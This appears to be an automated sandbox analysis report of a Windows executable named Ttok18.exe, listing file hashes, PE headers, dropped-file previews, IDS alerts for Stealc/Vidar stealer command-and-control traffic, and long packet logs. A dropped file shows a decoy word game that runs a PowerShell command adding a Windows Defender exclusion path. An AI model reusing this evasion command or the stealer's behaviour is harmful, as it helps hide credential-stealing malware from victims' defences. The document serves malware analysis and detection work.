                                                                                                                                                                      Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):1660
                                                                                                                                                                      Entropy (8bit):4.301517070642596
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                      MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                      SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:false
URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Process:C:\Users\user\Desktop\Ttok18.exe
File Type:ASCII text, with CRLF, LF line terminators
Category:dropped
Size (bytes):3635
Entropy (8bit):5.145130246324884
Encrypted:false
SSDEEP:48:3ZEbs7qCfpwwyxK0w4Zticx+3OtZx+3QlticB+3OtZB+3Qqntic0+3OtZ0+3i0wP:ebUwtNw4s5gY5gqlqvwbOo
MD5:E871551FB912FC1DC0B8DE094A85C899
SHA1:F11CFABA51A468EDDE8796CE918797AC6BAAE009
SHA-256:58366D47C49A541363F455148C428501B7B83BA2D2E0D7044BCBC3B240AA9E67
SHA-512:E2526D5B0A7D6B51468FD9807945B93415C9C1FC4709E97161F2EBF3300383AE8183B99724CED12E9723CD65088AD225EEAE37FC313E4A8A6B6D2436C82624B5
Malicious:false
Preview:Guess the word from the list:..1. Jungle..2. Banana..3. Fish..4. Lion..5. Kite..6. Nest..7. Monkey..8. Penguin..9. Queen..10. Island..11. Giraffe..12. Car..13. Clan..14. River..15. Tree..16. Sun..17. Ocean..18. Apple..19. Dog..20. House..21. Elephant..Enter the word: .Time's up! The program will input the word 'Clan'...Folder 'AAxBDhzeE' successfully created on C drive....You won a random image:.... ___.. .' '... / \.. | |.. \ /.. '. .'.. `-'....What image was generated? (fish, mountain, boat): .Time's up! The program will input the correct answer: boat..Error adding exclusion for C:\AAxBDhzeE: Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\AAxBDhzeE..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Ad

File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):0.008789177963329333
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name:Ttok18.exe
File size:22'020'096 bytes
MD5:3544b39481484f67f807e54dd58a93d6
SHA1:36691434d2adbb78798bd87090a44e011a4188b8
SHA256:ba979aec878047d3191de74aeed1cb884802da8a1bda6ad8323d5bfae9d528fe
SHA512:4f255c473e67563d7121d9846b1027f2af5a4a3acbadd22b1f596ae248d9e981d56c6757198d0d6ee7bb8219e0e333da4b077de78187b2621ae167f279d97c26
SSDEEP:384:x7NC8gTTF+chkAcvEUgE2a24dsp0T808rFaVz:PxgvF+6kVvfbcRaJ
TLSH:EA27E60223E95126FA7F6B7D5C7242144733BDA3AC36EB4C29EC604E5FA778449607A3
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....?..........."...0..4...........S... ...`....@.. ....................................`................................
Icon Hash:90cececece8e8eb0
Entrypoint:0x4053fa
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows cui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]
TLS Callbacks:
CLR (.Net) Version:v4.0.30319
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

Instruction
jmp dword ptr [00402000h]

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x53a8          | 0x4f         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x6000          | 0x58c        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x8000          | 0xc          | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x531c          | 0x38         | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x3400 | 0x3400 | 011f0b5a834ddae1739be2df85bbd209 | False | 0.48828125 | data | 5.376676584631292 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x6000 | 0x58c | 0x600 | 6ce900aa6f5ef6addbe166008c1ea961 | False | 0.4134114583333333 | data | 4.023178449253273 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x8000 | 0xc | 0x200 | ada691d652edc54d38296e18f64ff460 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x6090 | 0x2fc | data | | | 0.43848167539267013
RT_MANIFEST | 0x639c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-04T17:04:35.430618+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 159.69.102.165 | 443 | 192.168.2.4 | 49742 | TCP
2024-12-04T17:04:37.730153+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.4 | 49743 | 159.69.102.165 | 443 | TCP
2024-12-04T17:04:37.730347+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 159.69.102.165 | 443 | 192.168.2.4 | 49743 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                      Dec 4, 2024 17:04:22.967298985 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.967325926 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.967396021 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.967406988 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.967458963 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.967467070 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.986985922 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.987011909 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.987088919 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.987097979 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:22.987123013 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:22.987143993 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.006493092 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.006510973 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.006635904 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.006644964 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.006683111 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.024765015 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.024795055 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.024909973 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.024925947 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.024969101 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.110115051 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.110140085 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.110210896 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.110239983 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.110276937 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.110296965 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.123213053 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.123236895 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.123290062 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.123307943 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.123337984 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.123353004 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.138724089 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.138751030 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.138876915 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.138895988 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.138936996 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.153793097 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.153853893 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.153883934 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.153898954 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.153934956 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.153951883 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.164648056 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.164666891 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.164758921 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.164789915 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.164860010 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.176703930 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.176719904 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.176796913 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.176808119 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.176867008 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.185969114 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.185990095 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.186058998 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.186069012 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.186110973 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.294612885 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.294634104 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.294750929 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.294771910 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.294842958 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.302432060 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.302448034 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.302516937 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.302525043 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.302567005 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.311790943 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.311810017 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.311896086 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.311903000 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.311944962 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.321508884 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.321536064 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.321577072 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.321583986 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.321608067 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.321630001 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.329978943 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.329994917 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.330064058 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.330071926 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.330133915 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.335690975 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.335737944 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.335761070 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.335767984 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.335807085 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.345205069 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.345221043 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.345310926 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.345319986 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.345360041 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.354222059 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.354238987 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.354316950 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.354325056 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.354367018 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.364260912 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.364276886 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.364356995 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.364370108 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.364438057 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.486663103 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.486732960 CET44349737185.199.111.133192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.486762047 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.486813068 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.487301111 CET49737443192.168.2.4185.199.111.133
                                                                                                                                                                      Dec 4, 2024 17:04:23.947844028 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                      Dec 4, 2024 17:04:23.947889090 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.947962999 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                      Dec 4, 2024 17:04:23.955842018 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                      Dec 4, 2024 17:04:23.955857038 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:25.323975086 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:25.324141026 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                      Dec 4, 2024 17:04:25.374109030 CET49738443192.168.2.4149.154.167.99
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 4, 2024 17:04:25.374125957 CET | 443 | 49738 | 149.154.167.99 | 192.168.2.4
Dec 4, 2024 17:04:25.374495983 CET | 443 | 49738 | 149.154.167.99 | 192.168.2.4
Dec 4, 2024 17:04:25.376344919 CET | 49738 | 443 | 192.168.2.4 | 149.154.167.99
Dec 4, 2024 17:04:25.378498077 CET | 49738 | 443 | 192.168.2.4 | 149.154.167.99
Dec 4, 2024 17:04:25.423331022 CET | 443 | 49738 | 149.154.167.99 | 192.168.2.4
Dec 4, 2024 17:04:25.882402897 CET | 443 | 49738 | 149.154.167.99 | 192.168.2.4
Dec 4, 2024 17:04:25.882430077 CET | 443 | 49738 | 149.154.167.99 | 192.168.2.4
Dec 4, 2024 17:04:25.882481098 CET | 443 | 49738 | 149.154.167.99 | 192.168.2.4
Dec 4, 2024 17:04:25.882502079 CET | 443 | 49738 | 149.154.167.99 | 192.168.2.4
Dec 4, 2024 17:04:25.882524967 CET | 49738 | 443 | 192.168.2.4 | 149.154.167.99
Dec 4, 2024 17:04:25.882600069 CET | 49738 | 443 | 192.168.2.4 | 149.154.167.99
Dec 4, 2024 17:04:25.886178017 CET | 49738 | 443 | 192.168.2.4 | 149.154.167.99
Dec 4, 2024 17:04:25.886193991 CET | 443 | 49738 | 149.154.167.99 | 192.168.2.4
Dec 4, 2024 17:04:26.046247005 CET | 49739 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:26.046299934 CET | 443 | 49739 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:26.046369076 CET | 49739 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:26.046786070 CET | 49739 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:26.046802998 CET | 443 | 49739 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:27.860771894 CET | 443 | 49739 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:27.860892057 CET | 49739 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:27.864387989 CET | 49739 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:27.864406109 CET | 443 | 49739 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:27.864733934 CET | 443 | 49739 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:27.864888906 CET | 49739 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:27.865272045 CET | 49739 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:27.907341003 CET | 443 | 49739 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:28.535201073 CET | 443 | 49739 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:28.535285950 CET | 443 | 49739 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:28.535372019 CET | 49739 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:28.535403013 CET | 49739 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:28.537889957 CET | 49739 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:28.537913084 CET | 443 | 49739 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:28.547231913 CET | 49740 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:28.547285080 CET | 443 | 49740 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:28.547420979 CET | 49740 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:28.547915936 CET | 49740 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:28.547930956 CET | 443 | 49740 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:29.947375059 CET | 443 | 49740 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:29.947453022 CET | 49740 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:29.947988033 CET | 49740 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:29.947999001 CET | 443 | 49740 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:29.949870110 CET | 49740 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:29.949875116 CET | 443 | 49740 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:30.836042881 CET | 443 | 49740 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:30.836117029 CET | 443 | 49740 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:30.836148024 CET | 49740 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:30.836168051 CET | 49740 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:30.836518049 CET | 49740 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:30.836538076 CET | 443 | 49740 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:30.842648029 CET | 49741 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:30.842700958 CET | 443 | 49741 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:30.842813015 CET | 49741 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:30.843039989 CET | 49741 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:30.843055010 CET | 443 | 49741 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:32.245713949 CET | 443 | 49741 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:32.245904922 CET | 49741 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:32.246404886 CET | 49741 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:32.246417046 CET | 443 | 49741 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:32.248251915 CET | 49741 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:32.248260975 CET | 443 | 49741 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:33.124758005 CET | 443 | 49741 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:33.124779940 CET | 443 | 49741 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:33.124845028 CET | 443 | 49741 | 159.69.102.165 | 192.168.2.4
Dec 4, 2024 17:04:33.124995947 CET | 49741 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:33.124995947 CET | 49741 | 443 | 192.168.2.4 | 159.69.102.165
Dec 4, 2024 17:04:33.125335932 CET | 49741 | 443 | 192.168.2.4 | 159.69.102.165
